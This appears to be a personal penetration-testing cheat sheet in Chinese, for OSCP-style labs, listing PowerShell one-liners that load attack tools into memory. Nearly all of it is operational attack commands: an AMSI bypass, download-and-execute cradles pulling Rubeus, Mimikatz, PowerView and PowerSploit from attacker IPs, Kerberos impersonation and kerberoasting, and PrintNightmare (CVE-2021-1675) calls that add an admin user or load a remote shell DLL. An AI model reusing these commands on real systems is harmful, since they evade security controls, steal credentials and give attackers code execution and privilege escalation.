4-内存加载速查 - My-oscp-all-things

#内存加载 ``` $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1) ``` #### 内存加载Rubeus ``` (New-Object System.Net.WebClient).DownloadString('http://192.168.49.84/amsi.txt') | IEX $data = (New-Object System.Net.WebClient).DownloadData('http://192.168.49.57/Rubeus.exe') $assem = [System.Reflection.Assembly]::Load($data) [Rubeus.Program]::Main("purge".Split()) [Rubeus.Program]::Main("s4u /user:web01$ /rc4:12343649cc8ce713962859a2934b8cbb /impersonateuser:administrator /msdsspn:cifs/file01 /ptt".Split()) //wait test [Rubeus.Program]::Main("kerberoast /outfile:hashes.txt /format:hashcat".Split()) ``` #### 内存载入amsi bypass ``` (New-Object System.Net.WebClient).DownloadString('http://192.168.49.84/amsi.txt') | IEX ``` #### 内存载入mimikatz #待测试 ``` (New-Object System.Net.WebClient).DownloadString('http://192.168.49.84:81/Invoke-Mimikatz.ps1') | iex ``` #### 内存载入powerview ``` (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/PowerView.ps1') | iex ``` #### 内存2021-1675 ``` (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57:88/Invoke-Printnightmare.ps1') | iex 2021-1675 Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure" Invoke-Nightmare -DriverName "SensorService" -NewUser "john" -NewPassword "SuperSecure" Invoke-Nightmare -DriverName "tapisrv1" -NewUser "john" -NewPassword "SuperSecure" Invoke-Nightmare -DriverName "dq15w" success ! Import-Module .\cve-2021-1675.ps1 Invoke-Nightmare -DLL "c:\users\public\met.dll" Invoke-Nightmare -DLL "//192.168.49.57/test/shell.dll" Invoke-Nightmare -DLL "c:\users\nina\desktop\adduser64.dll" Invoke-Nightmare -DLL "c:\users\nina\desktop\adduser64.dll" ``` #### 内存载入powersharppack ``` (New-Object System.Net.WebClient).DownloadString('http://192.168.49.84/PowerSharpPack.ps1') | IEX ``` #### POWERup MSSQL ``` (New-Object System.Net.WebClient).DownloadString('http://192.168.49.84:81/PowerUpSQL.ps1') | iex ``` #### AMSI SHELL //有失败几率，最好是直接用powercat来好了 ``` (New-Object System.Net.WebClient).DownloadString('http://192.168.49.84/amsi.txt') | iex $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1) IEX (New-Object Net.WebClient).DownloadString('http://192.168.49.84/run.ps1') | iex Start-Sleep -Seconds 1000000 ``` #### powersploit ``` (New-Object System.Net.WebClient).DownloadString('http://192.168.49.84/PowerSploit.psd1') | iex ``` ``` Get-LAPSComputers ``` #### winpwn ``` (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57:88/finepwn.ps1') | iex ```